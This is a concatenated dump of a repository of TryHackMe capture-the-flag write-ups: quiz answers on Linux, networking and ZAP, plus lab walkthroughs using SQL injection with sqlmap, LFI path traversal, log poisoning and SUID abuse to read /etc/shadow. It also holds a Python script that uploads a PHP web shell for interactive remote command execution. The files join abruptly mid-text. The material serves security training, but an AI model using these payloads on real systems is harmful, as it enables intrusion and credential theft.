3 | - What does ZAP stand for?
4 |
5 | - `Zed Attack proxy`
6 |
7 | - Connect to the TryHackMe network and deploy the machine. Once deployed, wait a few minutes and visit the web application: http://
8 |
9 | no answer needed
10 |
11 | - I've read the task.
12 |
13 | no answer needed
14 |
15 | - Install ZAP on an operating system of your choice!
16 |
17 | no answer needed
18 |
19 | - Open OWASP ZAP, ready to follow along with this room.
20 |
21 | no answer needed
22 |
23 | - Set up Ajax Spider
24 |
25 | no answer needed
26 |
27 | - What IP do we use for the proxy?
28 |
29 | - `127.0.0.1`
30 |
31 | - Try scanning the DVWA web application as an authenticated user.
32 |
33 | no answer needed
34 |
35 | - Try brute-forcing the DVWA web application.
36 |
37 | no answer needed
38 |
39 | - Use ZAP to bruteforce the DVWA 'brute-force' page. What's the password?
40 |
41 | - `password`
42 |
43 | - Set up HUNT on your Zap application to automatically perform passive scans on sites you visit!
44 |
45 | no answer needed
46 |
47 | - Check out the additional reading material.
48 |
49 | no answer needed
50 |
--------------------------------------------------------------------------------
/JavaScript-Basics/README.md:
--------------------------------------------------------------------------------
1 | # JavaScript Basics
2 |
3 | - Let's Begin
4 |
5 | no answer needed
6 |
7 | - What type of data type is this: 'Neo'?
8 |
9 | - `string`
10 |
11 | - What data type is true/false?
12 |
13 | - `boolean`
14 |
15 | - What is John's occupation?
16 |
17 | - `Master Hacker`
18 |
19 | - What tag is used for linking a JavaScript file to HTML?
20 |
21 | - `script`
22 |
23 | - Congratulations! You can now write conditionals!
24 |
25 | no answer needed
26 |
27 | - Finished with Functions!
28 |
29 | no answer needed
30 |
31 | - What type of brackets are used for arrays?
32 |
33 | - `[]`
34 |
35 | - What color pill did we choose?
36 |
37 | - `red pill`
38 |
39 | - What is the output of this code?
40 |
41 | - `Tyrell`
42 |
43 | - Loops repeat until the written code is finished running (true/false)
44 |
45 | - `true`
46 |
47 | - What loop doesn't require the condition to be true for it execute at least once?
48 |
49 | - `do...while`
50 |
51 | - What is the DOM?
52 |
53 | - `document object model`
54 |
55 | - What is it called when XSS is used to record keystrokes?
56 |
57 | - `keylogging`
58 |
59 | - JavaScript Basics Master!
60 |
61 | no answer needed
62 |
63 | - Sort the array [1,10,5,15,2,7,28,900,45,18,27]
64 |
65 | - [solution](https://github.com/edoardottt/tryhackme-ctf/blob/main/JavaScript-Basics/sort.js). Try with `node sort.js`.
66 | - `[1,2,5,7,10,18,27,28,45,900]`
67 |
68 |
69 |
70 |
71 |
72 |
--------------------------------------------------------------------------------
/JavaScript-Basics/sort.js:
--------------------------------------------------------------------------------
1 |
2 | function sort(array) {
3 | for (var i=1; i`
6 | - Visit `http://`
7 | - Interesting content here: `http:///item.php?id=5`
8 | - `scilla dir -target `
9 | - `/assets` accessible, but nothing interesting.
10 | - `http:///item.php?id=%27%20OR%201=1%20--%20-`
11 | - WOOHOO.
12 | - `sqlmap -u "http:///item.php?id=1" --dump`
13 | - `****`
14 |
15 | - How many columns does the table have?
16 |
17 | - also with: `http:///item.php?id=5%20union%20select%201,2,3,4,5`
18 | - `5`
19 |
20 | - Whats the system version?
21 |
22 | - `ubuntu **.**`
23 |
24 | - What is dennis' password?
25 |
26 | - `********`
27 |
28 | - Locate and get the first flag contents.
29 |
30 | - `ssh dennis@`, `yes` and enter the password.
31 | - `cat flag1.txt`
32 | - `**************************`
33 |
34 | - Whats the contents of the second flag?
35 |
36 | - `cat .*`
37 | - `cat /boot/grub/fonts/flagTwo.txt`
38 | - `****************************`
39 |
40 | - Whats the contents of the third flag?
41 |
42 | - `cat /home/dennis/.bash_history`
43 | - `****************************`
44 |
45 | - There is no fourth flag.
46 |
47 | no answer needed
48 |
49 | - Whats the contents of the fifth flag?
50 |
51 | - `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`
52 | - `sudo python3 -m http.server`
53 | - `wget http://:8000/LinEnum.sh`
54 | - `chmod +x LinEnum.sh`
55 | - `./LinEnum.sh`
56 | - `sudo -l`
57 | - scp withou password.
58 | - https://gtfobins.github.io/gtfobins/scp/#sudo
59 | - `cat /root/root.txt`
60 | - `*************************`
61 |
62 |
63 |
--------------------------------------------------------------------------------
/LFI-Basics/README.md:
--------------------------------------------------------------------------------
1 | # LFI Basics
2 |
3 | - Start the VM and access it using your browser.
4 |
5 | no answer needed
6 |
7 | - Access the first walkthrough, and add a parameter at the end of the link named "?page=".
8 |
9 | no answer needed
10 |
11 | - Let's include the home page. At the "?page=" parameter enter home.html to include the home page.
12 |
13 | no answer needed
14 |
15 | - What's the message you get when you include the home.html?
16 |
17 | `You included home.html`
18 |
19 | - Type /etc/passwd in the parameter to read it.
20 |
21 | no answer needed
22 |
23 | - What user that it's not by default there is present?
24 |
25 | - `lfi`
26 |
27 | - Well done! You've exploited your first local file inclusion!
28 |
29 | no answer needed
30 |
31 | - Now that we know what Directory Traversal is, let's access the second walkthrough.
32 |
33 | no answer needed
34 |
35 | - Add the "?page=" parameter, and try to include the home page again. Does it work (Yes/No)?
36 |
37 | - `No`
38 |
39 | - Use "../" to move one directory up.
40 |
41 | no answer needed
42 |
43 | - What are the credit card numbers?
44 |
45 | - `http:///lfi2/lfi.php?page=../creditcard`
46 | - `****-****-****-****`
47 |
48 | - The same way you can include the passwd file. You'll have to move more directories up. Try reading the passwd file.
49 |
50 | no answer needed
51 |
52 | - `http:///lfi2/lfi.php?page=../../../../../etc/passwd`
53 |
54 | - Well done! You've exploited your first LFI using Directory Traversal.
55 |
56 | no answer needed
57 |
58 | - We got our hands a bit dirty with basic LFI and LFI using path traversal. Let's dig a little deeper, and use log poisoning to get access to the underlying operating system.
59 |
60 | no answer needed
61 |
62 | - We will inject some malicious php code into the server's log.
63 |
64 | no answer needed
65 |
66 | - Access the third walkthrough, add the "?page=" parameter and let's try reading the apache log file.
67 | The log file is located at the following path: /var/log/apache2/access.log
68 |
69 | no answer needed
70 |
71 | - `http:///lfi/lfi.php?page=/var/log/apache2/access.log`
72 |
73 | - Can you read the log?
74 |
75 | - `yes`
76 |
77 | - Forward the request and add your parameter to the link (in my case lfi).
78 | The link becomes: http:///lfi/lfi.php?page=/var/log/apache2/access.log&lfi=
79 | Now you can execute commands on the system!
80 |
81 | no answer needed
82 |
83 | - Open Burpsuite and set up the proxy.
84 | - Catch a request and edit it as shown, then forward it.
85 | - Add the lfi command to the url.
86 |
87 | - Give it a try and run uname -r. What's the output of the command?
88 |
89 | - `4.15.0-72-generic`
90 |
91 | - With this knowledge read the flag from the lfi user home directory
92 |
93 | - Add the command `ls%20/home/lfi` instead of `uname -r`
94 | - Add th command `cat%20/home/lfi/flag.txt`
95 | - `THM{************22******************}`
96 |
97 |
98 |
--------------------------------------------------------------------------------
/LFI/README.md:
--------------------------------------------------------------------------------
1 | # LFI
2 |
3 | - Deploy the VM and access its web server: `http://`
4 |
5 | no answer needed
6 |
7 | - Look around the website. What is the name of the parameter you found on the website?
8 |
9 | - `page`
10 |
11 | - You can read the interesting files to check out while testing for LFI.
12 |
13 | no answer needed
14 |
15 | - This file can give information about the system like the name of all the existing users on the system.
16 |
17 | no answer needed
18 |
19 | - What is the name of the user on the system?
20 |
21 | - `falcon`
22 |
23 | - Once you find the name of the user it's important to see if you can include anything common and important in that user's directory, could be anything like theirs .bashrc etc
24 |
25 | no answer needed
26 |
27 | - Name of the file which can give you access to falcon's account on the system?
28 |
29 | - `id_rsa`
30 |
31 | - What is the user flag?
32 |
33 | - copy the file `id_rsa` inside your machine
34 | - `chmod 600 id_rsa`
35 | - `ssh falcon@ -i id_rsa`
36 | - `ls`
37 | - `cat user.txt`
38 | - `**********************`
39 |
40 | - What can falcon run as root?
41 |
42 | - `sudo -l`
43 | - `/bin/********`
44 |
45 | - Search gtfobins via the website or by using gtfo tool, to see if you find any way to use that binary for privilege escalation.
46 |
47 | no answer needed
48 |
49 | - What is the root flag?
50 |
51 | - `**********************`
52 |
53 | - Why not complete the LFI beginner level challenge next?
54 |
55 | no answer needed
56 |
57 |
58 |
59 |
60 |
--------------------------------------------------------------------------------
/LazyAdmin/hash.txt:
--------------------------------------------------------------------------------
1 | 42f749ade7f9e195bf475f37a44cafcb
--------------------------------------------------------------------------------
/Linux-Fundamentals/Linux-Fundamentals-Part-1/README.md:
--------------------------------------------------------------------------------
1 | # Linux Fundamentals - Part 1
2 |
3 | - Read the above
4 |
5 | no answer needed
6 |
7 | - Deploy the machine attached to this task!
8 | NOTE: If you have a machine open in the Welcome room (or any other room) please go to that room and terminate it before deploying the machine attached to this task. These machines are not the same, and only the one attached to this room will work.
9 |
10 | no answer needed
11 |
12 | - Read the above
13 |
14 | no answer needed
15 |
16 | - Read the above
17 |
18 | - `ssh shiba1@`
19 | - `yes` and insert password `shiba1`
20 | - When you're into the nootnoot machine as user shiba1 (the shell starts with `shiba1@nootnoot`) type `echo hello`
21 |
22 | - How would you output hello without a newline?
23 |
24 | - `echo -n hello`
25 |
26 | - What flag outputs all entries?
27 |
28 | - `-a`
29 |
30 | - What flag outputs things in a "long list" format?
31 |
32 | - `-l`
33 |
34 | - What flag numbers all output lines?
35 |
36 | - `-n`
37 |
38 | - Read the above!
39 |
40 | no answer needed
41 |
42 | - How would you run a binary called hello using the directory shortcut . ?
43 |
44 | - `./hello`
45 |
46 | - How would you run a binary called hello in your home directory using the shortcut ~ ?
47 |
48 | - `~/hello`
49 |
50 | - How would you run a binary called hello in the previous directory using the shortcut .. ?
51 |
52 | - `../hello`
53 |
54 | - What's the password for shiba2?
55 |
56 | - `touch noot.txt`
57 | - `./shiba1`
58 | - `pinguftw`
59 |
60 | - How do you specify which shell is used when you login?
61 |
62 | - `-s`
63 |
64 | - Join the Linux Fundamentals 2 room, and continue your learning journey: https://tryhackme.com/room/linux2
65 |
66 | no answer needed
67 |
--------------------------------------------------------------------------------
/Linux-Fundamentals/Linux-Fundamentals-Part-2/README.md:
--------------------------------------------------------------------------------
1 | # Linux Fundamentals - Part 2
2 |
3 | - Read the above.
4 |
5 | no answer needed
6 |
7 | - Deploy the machine attached to this task!
8 | NOTE: If you have a machine open in the Welcome room (or any other room) please go to that room and terminate it before deploying the machine attached to this task. These machines are not the same, and only the one attached to this room will work.
9 |
10 | no answer needed
11 |
12 | - Read the above
13 |
14 | no answer needed
15 |
16 | - SSH into the server
17 |
18 | - `ssh shiba2@`
19 | - Type `yes` and enter the password `pinguftw`
20 |
21 | - Read the above
22 |
23 | no answer needed
24 |
25 | - Read the above
26 |
27 | no answer needed
28 |
29 | - How would you set nootnoot equal to 1111?
30 |
31 | - `export nootnoot=1111`
32 |
33 | - What is the value of the home environment variable?
34 |
35 | - `echo $HOME`
36 | - `/home/shiba2`
37 |
38 | - Read the above!
39 |
40 | no answer needed
41 |
42 | - Read the above.
43 |
44 | no answer needed
45 |
46 | - What is shiba3's password?
47 |
48 | - `export test1234=$USER`
49 | - `./shiba2`
50 | - `happynoot******`
51 |
52 | - Read the above.
53 |
54 | no answer needed
55 |
56 | - Read the above!
57 |
58 | no answer needed
59 |
60 | - What permissions mean the user can read the file, the group can read and write to the file, and no one else can read, write or execute the file?
61 |
62 | - `460`
63 |
64 | - What permissions mean the user can read, write, and execute the file, the group can read, write, and execute the file, and everyone else can read, write, and execute the file.
65 |
66 | - `777`
67 |
68 | - How would you change the owner of file to paradox?
69 |
70 | - `chown paradox file`
71 |
72 | - What about the owner and the group of file to paradox?
73 |
74 | - `chown paradox:paradox file`
75 |
76 | - What flag allows you to operate on every file in the directory at once?
77 |
78 | - `-r`
79 |
80 | - What flag deletes every file in a directory?
81 |
82 | - `-r`
83 |
84 | - How do you suppress all warning prompts?
85 |
86 | - `-f`
87 |
88 | - How would you move file to /tmp
89 |
90 | - `mv file /tmp`
91 |
92 | - How would you output twenty to a file called test
93 |
94 | - `echo twenty > test`
95 |
96 | - Read the above
97 |
98 | no answer needed
99 |
100 | - Join the Linux Fundamentals 3 room, and finish learning Linux: https://tryhackme.com/room/linux3
101 |
102 | no answer needed
103 |
104 |
105 |
--------------------------------------------------------------------------------
/Linux-Fundamentals/Linux-Fundamentals-Part-3/README.md:
--------------------------------------------------------------------------------
1 | # Linux Fundamentals - Part 3
2 |
3 | - Read the above
4 |
5 | no answer needed
6 |
7 | - Deploy the machine attached to this task!
8 | NOTE: If you have a machine open in the Welcome room (or any other room) please go to that room and terminate it before deploying the machine attached to this task. These machines are not the same, and only the one attached to this room will work.
9 |
10 | no answer needed
11 |
12 | - `ssh shiba3@`
13 | - Type `yes` and enter the password `happynootnoises`
14 |
15 | - Using relative paths, how would you cd to your home directory.
16 |
17 | - `cd ~`
18 |
19 | - Using absolute paths how would you make a directory called test in /tmp
20 |
21 | - `mkdir /tmp/test`
22 |
23 | - How would I link /home/test/testfile to /tmp/test?
24 |
25 | - `ln /home/test/testfile /tmp/test`
26 |
27 | - How do you find files that have specific permissions?
28 |
29 | - `-perm`
30 |
31 | - How would you find all the files in /home
32 |
33 | - `find /home`
34 |
35 | - How would you find all the files owned by paradox on the whole system
36 |
37 | - `find / -user paradox`
38 |
39 | - What flag lists line numbers for every string found?
40 |
41 | - `-n`
42 |
43 | - How would I search for the string boop in the file aaaa in the directory /tmp
44 |
45 | - `grep boop /tmp/aaaa`
46 |
47 | - What is shiba4's password
48 |
49 | - `mkdir test && touch test/test1234`
50 | - `find / -name shiba4 | grep shiba4 | grep shiba4`
51 | - `/opt/secret/shiba4`
52 | - `test1234`
53 | - `su shiba4` and enter password `test1234`
54 |
55 | - Read the above
56 |
57 | no answer needed
58 |
59 | - How do you specify which user you want to run a command as.
60 |
61 | - `-u`
62 |
63 | - How would I run whoami as user jen?
64 |
65 | - `sudo -u jen whoami`
66 |
67 | - How do you list your current sudo privileges(what commands you can run, who you can run them as etc.)
68 |
69 | - `-l`
70 |
71 | - How would I add the user test to the group test?
72 |
73 | - `sudo usermod -a -G test test`
74 |
75 | - Read the above
76 |
77 | no answer needed
78 |
79 | - Read the above.
80 |
81 | no answer needed
82 |
83 | - Read the above
84 |
85 | no answer needed
86 |
87 | - Read the above
88 |
89 | no answer needed
90 |
91 | - Read the above!
92 |
93 | no answer needed
94 |
95 |
96 |
--------------------------------------------------------------------------------
/Linux:-Local-Enumeration/README.md:
--------------------------------------------------------------------------------
1 | # Linux: Local Enumeration
2 |
3 | - Let's go!
4 |
5 | no answer needed
6 |
7 | - How would you execute /bin/bash with perl?
8 |
9 | - `perl -e 'exec "/bin/bash";'`
10 |
11 | - Where can you usually find the `id_rsa` file? (User = user)
12 |
13 | - `/home/user/.ssh/id_rsa`
14 |
15 | - Is there an `id_rsa` file on the box? (yay/nay)
16 |
17 | - `nay`
18 |
19 | - How would you print machine hardware name only?
20 |
21 | - `uname -m`
22 |
23 | - Where can you find bash history?
24 |
25 | - `~/.bash_history`
26 |
27 | - What's the flag?
28 |
29 | - `********************`
30 |
31 | - Can you read /etc/passwd on the box? (yay/nay)
32 |
33 | - `yay`
34 |
35 | - What's the password you found?
36 |
37 | - `find / -name *.bak -type f 2>/dev/null`
38 | - `cat /var/opt/passwords.bak`
39 | - `************`
40 |
41 | - Did you find a flag?
42 |
43 | - `find / -type f -name "flag.conf" 2>/dev/null`
44 | - `cat /etc/sysconf/flag.conf`
45 | - `**************`
46 |
47 | - Which SUID binary has a way to escalate your privileges on the box?
48 |
49 | - `find / -perm -4000 2>/dev/null`
50 | - `grep`
51 |
52 | - What's the payload you can use to read /etc/shadow with this SUID?
53 |
54 | - `grep '' /etc/shadow`
55 |
56 | - Try using those commands on your system!
57 |
58 | no answer needed
59 |
60 | - Got it!
61 |
62 | no answer needed
63 |
64 | - Read the above and consider completing mentioned rooms.
65 |
66 | no answer needed
67 |
68 |
69 |
70 |
--------------------------------------------------------------------------------
/MAL:-REMnux-The_Redux/README.md:
--------------------------------------------------------------------------------
1 | # MAL: REMnux - The Redux
2 |
3 | - I'm all buckled up and ready to get started.
4 |
5 | no answer needed
6 |
7 | - I've deployed my instance
8 |
9 | no answer needed
10 |
11 | - How many types of categories of "Suspicious elements" are there in "notsuspicious.pdf"
12 |
13 | - `3`
14 |
15 | - Use peepdf to extract the javascript from "notsuspicious.pdf". What is the flag?
16 |
17 | - `THM{Luckily_This_**************+*}`
18 |
19 | - How many types of categories of "Suspicious elements" are there in "advert.pdf"
20 |
21 | - `6`
22 |
23 | - Now use peepdf to extract the javascript from "advert.pdf". What is the value of "cName"?
24 |
25 | - `not************`
26 |
27 | - What is the name of the Macro for "DefinitelyALegitInvoice.doc"
28 |
29 | - `****Legit`
30 |
31 | - What is the URL the Macro in "Taxes2020.doc" would try to launch?
32 |
33 | - `http://tryhackme.com/*************.**`
34 |
35 | - What is the highest file entropy a file can have?
36 |
37 | - `8`
38 |
39 | - What is the lowest file entropy a file can have?
40 |
41 | - `0`
42 |
43 | - Name a common packer that can be used for applications?
44 |
45 | - `UPX`
46 |
47 | - Pretty interesting stuff!
48 |
49 | no answer needed
50 |
51 | - Fin.
52 |
53 | no answer needed
54 |
55 | - I'm curious to read up some more!
56 |
57 | no answer needed
58 |
59 |
60 |
--------------------------------------------------------------------------------
/Networking/README.md:
--------------------------------------------------------------------------------
1 | # Networking
2 |
3 | - How many categories of IPv4 addresses are there?
4 |
5 | - `5`
6 |
7 | - Which type is for research? *Looking for a letter rather than a number here
8 |
9 | - `e`
10 |
11 | - How many private address ranges are there?
12 |
13 | - `3`
14 |
15 | - Which private range is typically used by businesses?
16 |
17 | - `a`
18 |
19 | - There are two common default private ranges for home routers, what is the first one?
20 |
21 | - `192.168.0.0`
22 |
23 | - How about the second common private home range?
24 |
25 | - `192.168.1.0`
26 |
27 | - How many addresses make up a typical class C range? Specifically a /24
28 |
29 | - `256`
30 |
31 | - Of these addresses two are reserved, what is the first address typically reserved as?
32 |
33 | - `network`
34 |
35 | - The very last address in a range is typically reserved as what address type?
36 |
37 | - `broadcast`
38 |
39 | - A third predominant address type is typically reserved for the router, what is the name of this address type?
40 |
41 | - `gateway`
42 |
43 | - Which address is reserved for testing on individual computers?
44 |
45 | - `127.0.0.1`
46 |
47 | - A particularly unique address is reserved for unroutable packets, what is that address? This can also refer to all IPv4 addresses on the local machine.
48 |
49 | - `0.0.0.0`
50 |
51 | - 1001 0010
52 |
53 | - `146`
54 |
55 | - 0111 0111
56 |
57 | - `119`
58 |
59 | - 1111 1111
60 |
61 | - `255`
62 |
63 | - 1100 0101
64 |
65 | - `197`
66 |
67 | - 1111 0110
68 |
69 | - `246`
70 |
71 | - 0001 0011
72 |
73 | - `19`
74 |
75 | - 1000 0001
76 |
77 | - `129`
78 |
79 | - 0011 0001
80 |
81 | - `49`
82 |
83 | - 0111 1000
84 |
85 | - `120`
86 |
87 | - 1111 0000
88 |
89 | - `240`
90 |
91 | - 0011 1011
92 |
93 | - `59`
94 |
95 | - 0000 0111
96 |
97 | - `7`
98 |
99 | - 238
100 |
101 | - `11101110`
102 |
103 | - 34
104 |
105 | - `00100010`
106 |
107 | - 123
108 |
109 | - `01111011`
110 |
111 | - 50
112 |
113 | - `00110010`
114 |
115 | - 255
116 |
117 | - `11111111`
118 |
119 | - 200
120 |
121 | - `11001000`
122 |
123 | - 10
124 |
125 | - `00001010`
126 |
127 | - 138
128 |
129 | - `10001010`
130 |
131 | - 1
132 |
133 | - `00000001`
134 |
135 | - 13
136 |
137 | - `00001011`
138 |
139 | - 250
140 |
141 | - `11111010`
142 |
143 | - 114
144 |
145 | - `01110010`
146 |
147 | - 10.240.1.1
148 |
149 | - `a`
150 |
151 | - 150.10.15.0
152 |
153 | - `b`
154 |
155 | - 192.14.2.0
156 |
157 | - `c`
158 |
159 | - 148.17.9.1
160 |
161 | - `b`
162 |
163 | - 193.42.1.1
164 |
165 | - `c`
166 |
167 | - 126.8.156.0
168 |
169 | - `a`
170 |
171 | - 220.200.23.1
172 |
173 | - `c`
174 |
175 | - 230.230.45.58
176 |
177 | - `d`
178 |
179 | - 177.100.18.4
180 |
181 | - `b`
182 |
183 | - 119.18.45.0
184 |
185 | - `a`
186 |
187 | - 117.89.56.45
188 |
189 | - `a`
190 |
191 | - 215.45.45.0
192 |
193 | - `c`
194 |
195 |
196 |
197 |
198 |
199 |
--------------------------------------------------------------------------------
/Ninja-Skills/README.md:
--------------------------------------------------------------------------------
1 | # Ninja Skills
2 |
3 | - Which of the above files are owned by the best-group group(enter the answer separated by spaces in alphabetical order)
4 |
5 | - This is our base command: `find / -type f \( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \) 2>>/dev/null`
6 | - `find / -type f \( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \) 2>>/dev/null | xargs ls -alh`
7 | - `D8B3 v2Vb`
8 |
9 | - Which of these files contain an IP address?
10 |
11 | - `find / -type f \( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \) 2>>/dev/null | xargs grep -Eo "([0-9]{1,3}[\.]){3}[0-9]{1,3}"`
12 | - `oiMO`
13 |
14 | - Which file has the SHA1 hash of 9d54da7584015647ba052173b84d45e8007eba94
15 |
16 | - `find / -type f \( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \) 2>>/dev/null | xargs sha1sum`
17 | - `c4ZX`
18 |
19 | - Which file contains 230 lines?
20 |
21 | - The solution is `bny0`, but this file is not shown on the ls output. I'm doing something wrong?
22 |
23 | - Which file's owner has an ID of 502?
24 |
25 | - `find / -type f \( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \) 2>>/dev/null | xargs ls -ln`
26 | - `X1Uy`
27 |
28 | - Which file is executable by everyone?
29 |
30 | - `find / -type f \( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \) 2>>/dev/null | xargs ls -la`
31 | - `8V2L`
32 |
33 |
34 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/OWASP-Juice-Shop/ftp/acquisitions.md:
--------------------------------------------------------------------------------
1 | # Planned Acquisitions
2 |
3 | > This document is confidential! Do not distribute!
4 |
5 | Our company plans to acquire several competitors within the next year.
6 | This will have a significant stock market impact as we will elaborate in
7 | detail in the following paragraph:
8 |
9 | Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy
10 | eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam
11 | voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet
12 | clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit
13 | amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam
14 | nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat,
15 | sed diam voluptua. At vero eos et accusam et justo duo dolores et ea
16 | rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem
17 | ipsum dolor sit amet.
18 |
19 | Our shareholders will be excited. It's true. No fake news.
20 |
--------------------------------------------------------------------------------
/OWASP-Juice-Shop/ftp/coupons_2013.md.bak%00..md:
--------------------------------------------------------------------------------
1 | n'
25 |
26 | file = {'image': (random_file + '.php', payload, 'text/php')}
27 | print('> Attempting to upload PHP web shell...')
28 | r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
29 | print('> Verifying shell upload...')
30 | r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
31 |
32 | if random_file in r.text:
33 | print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php')
34 | print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami')
35 | launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
36 | if launch_shell.lower() == 'y':
37 | while True:
38 | cmd = str(input('RCE $ '))
39 | if cmd == 'exit':
40 | sys.exit(0)
41 | r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False)
42 | print(r.text)
43 | else:
44 | if r.status_code == 200:
45 | print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
46 | else:
47 | print('> Web shell failed to upload! The web server may not have write permissions.')
--------------------------------------------------------------------------------
/OWASP-Top-10/48973.txt:
--------------------------------------------------------------------------------
1 | # Exploit Title: CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting
2 | # Date: 30/10/2020
3 | # Exploit Author: Vyshnav NK
4 | # Vendor Homepage: https://projectworlds.in/
5 | # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
6 | # Version: 1.0
7 | # Tested on: Windows 10 and Windows 7
8 |
9 | CSE Bookstore is vulnerable to a Persistent Cross-site scripting on Checkout.php and cartp.php, Where an user can able to add quantity as an XSS Payload and once added each time when we click on MyCart option it triggers as stored one
10 |
11 | The below URL can be accessed by a User
12 |
13 | URL : http://localhost/php/checkout.php and http://localhost/php/cart.php
14 |
15 | Payload : ">